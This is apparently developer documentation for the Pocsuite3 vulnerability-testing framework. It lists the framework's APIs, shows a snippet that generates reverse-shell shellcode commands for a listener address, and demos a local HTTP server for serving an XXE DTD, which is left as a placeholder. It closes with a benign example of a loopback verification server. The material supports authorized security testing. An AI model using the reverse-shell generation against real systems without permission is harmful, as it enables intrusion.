# General API list

When writing a PoC, call the APIs that Pocsuite3 has already wrapped wherever a suitable one exists, instead of re-implementing them.

## Common methods

| Method | Description |
|---|---|
| `from pocsuite3.api import logger` | Logging, e.g. `logger.log(info)` |
| `from pocsuite3.api import requests` | Request class; used the same way as `requests` |
| `from pocsuite3.api import Seebug` | Seebug API calls |
| `from pocsuite3.api import ZoomEye` | ZoomEye API calls |
| `from pocsuite3.api import Shodan` | Shodan API calls |
| `from pocsuite3.api import Fofa` | Fofa API calls |
| `from pocsuite3.api import Quake` | Quake API calls |
| `from pocsuite3.api import Hunter` | Hunter API calls |
| `from pocsuite3.api import Censys` | Censys API calls |
| `from pocsuite3.api import CEye` | CEye API calls |
| `from pocsuite3.api import Interactsh` | Interactsh API calls |
| `from pocsuite3.api import crawl` | Simple crawler |
| `from pocsuite3.api import PHTTPServer` | Built-in HTTP server |
| `from pocsuite3.api import REVERSE_PAYLOAD` | Reverse-connection shell payloads |
| `from pocsuite3.api import get_results` | Retrieve results |

(TODO: API documentation to be completed)
## Shellcode generation support

In some special Linux and Windows environments it is hard to obtain a reverse shell. For this reason we built reverse-connection shellcode for Windows/Linux x86/x64 and exposed it through an API: given only command-execution permission, the framework can write the shellcode to the target machine and run the reverse-shell command automatically.

Demo PoC: https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/pocs/thinkphp_rce2.py

```python
from pocsuite3.api import generate_shellcode_list
# OS, OS_ARCH and the listener helpers are also exported by pocsuite3.api
from pocsuite3.api import get_listener_ip, get_listener_port, OS, OS_ARCH

_list = generate_shellcode_list(listener_ip=get_listener_ip(),
                                listener_port=get_listener_port(),
                                os_target=OS.LINUX,
                                os_target_arch=OS_ARCH.X86)
```

This generates a long sequence of commands; executing them yields a reverse shell.
## Built-in HTTP server

For vulnerabilities that can only be verified with the help of a third-party HTTP service, Pocsuite3 provides a matching API that starts a local HTTP server so the PoC can perform the check on its own.

See the test case: https://github.com/knownsec/pocsuite3/blob/master/tests/test_httpserver.py
```python
"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more information, please visit https://pocsuite.org
"""
from http.server import SimpleHTTPRequestHandler

from pocsuite3.api import Output, POCBase, register_poc
from pocsuite3.api import PHTTPServer


class MyRequestHandler(SimpleHTTPRequestHandler):
    def do_GET(self):
        path = self.path
        status = 404
        count = 0
        xxe_dtd = '''xxx'''  # placeholder DTD body served to the target

        if path == "/xxe_dtd":
            body = xxe_dtd.encode()
            count = len(body)  # Content-Length counts bytes, not characters
            status = 200
            self.send_response(status)
            self.send_header('Content-Type', 'text/html')
            self.send_header('Content-Length', '{}'.format(count))
            self.end_headers()
            self.wfile.write(body)
            return

        # Any other path: empty 404 response
        self.send_response(status)
        self.send_header('Content-Type', 'text/html')
        self.send_header("Content-Length", "{}".format(count))
        self.end_headers()

    def do_HEAD(self):
        status = 404
        if self.path.endswith('jar'):
            status = 200
        self.send_response(status)
        self.send_header("Content-type", "text/html")
        self.send_header("Content-Length", "0")
        self.end_headers()


class DemoPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['seebug']
    vulDate = '2018-03-08'
    createDate = '2018-04-12'
    updateDate = '2018-04-13'
    references = ['']
    name = ''
    appPowerLink = ''
    appName = ''
    appVersion = ''
    vulType = ''
    desc = '''
    '''
    samples = []
    install_requires = ['']

    def _verify(self):
        '''Simple http server demo
        default params:
            bind_ip='0.0.0.0'
            bind_port=666
            is_ipv6=False
            use_https=False
            certfile=os.path.join(paths.POCSUITE_DATA_PATH, 'cacert.pem')
            requestHandler=BaseRequestHandler
        You can write your own handler, default list current directory
        '''
        result = {}
        httpd = PHTTPServer(requestHandler=MyRequestHandler)
        httpd.start()
        # Write your code
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    _attack = _verify


register_poc(DemoPOC)
```
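The demo above starts the server but leaves the actual verification step to the reader. The following added example (not Pocsuite3's own code; it uses only the standard library as a stand-in for `PHTTPServer`) shows the complete loop a PoC needs around such a server: bind an ephemeral loopback port, serve a single marker path, record every request the handler sees, and decide "verified" only when the marker was actually fetched. The path `/verify_marker`, the marker body and the `LocalVerifyServer` class are assumptions made for this example; the out-of-band request is simulated locally with `urlopen`.

```python
# Added example: stdlib stand-in for the role PHTTPServer plays in a PoC.
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import urlopen

MARKER_PATH = "/verify_marker"          # hypothetical path the PoC serves
MARKER_BODY = b"pocsuite3-verify-ok"    # constructed marker body


class CallbackHandler(BaseHTTPRequestHandler):
    """Serves one marker path and records (client_ip, method, path) for every request."""
    hits = []  # shared across requests for the lifetime of the server

    def log_message(self, fmt, *args):
        pass  # keep the default stderr access log quiet

    def _send(self, status, body=b""):
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        if body and self.command != "HEAD":
            self.wfile.write(body)

    def do_GET(self):
        CallbackHandler.hits.append((self.client_address[0], "GET", self.path))
        if self.path == MARKER_PATH:
            self._send(200, MARKER_BODY)
        else:
            self._send(404)  # unknown paths get an empty 404 but are still recorded

    def do_HEAD(self):
        CallbackHandler.hits.append((self.client_address[0], "HEAD", self.path))
        self._send(200 if self.path == MARKER_PATH else 404)


class LocalVerifyServer:
    """Thread-backed HTTP server; port 0 lets the OS pick a free loopback port."""

    def __init__(self, bind_ip="127.0.0.1", bind_port=0):
        self.httpd = HTTPServer((bind_ip, bind_port), CallbackHandler)
        self.port = self.httpd.server_address[1]
        self._thread = threading.Thread(target=self.httpd.serve_forever, daemon=True)

    def start(self):
        self._thread.start()

    def stop(self):
        self.httpd.shutdown()
        self.httpd.server_close()

    def url(self, path):
        return "http://127.0.0.1:%d%s" % (self.port, path)


def run_verification():
    """Start the server, simulate the target fetching the marker, then decide.

    Returns (verified, unknown_status, hits): verified is True only when the
    marker path was requested and the body matched; unknown_status is the code
    returned for a path the handler does not know.
    """
    CallbackHandler.hits = []
    server = LocalVerifyServer()
    server.start()
    try:
        # Constructed stand-in for the target's out-of-band request.
        with urlopen(server.url(MARKER_PATH), timeout=5) as resp:
            body = resp.read()
        try:
            urlopen(server.url("/unknown"), timeout=5)
            unknown_status = 200
        except HTTPError as err:
            unknown_status = err.code
    finally:
        server.stop()  # always release the port, even if the check fails
    marker_seen = any(path == MARKER_PATH for _, _, path in CallbackHandler.hits)
    verified = body == MARKER_BODY and marker_seen
    return verified, unknown_status, list(CallbackHandler.hits)


if __name__ == "__main__":
    print(run_verification())
```

In a real PoC the decision would be driven by the target's request arriving at the handler (the `hits` list) rather than by a local `urlopen`; the point of recording client address, method and path is that `parse_output` can then report exactly which interaction proved the finding, and the server is always shut down in `finally` so a failed check does not leave a listener bound.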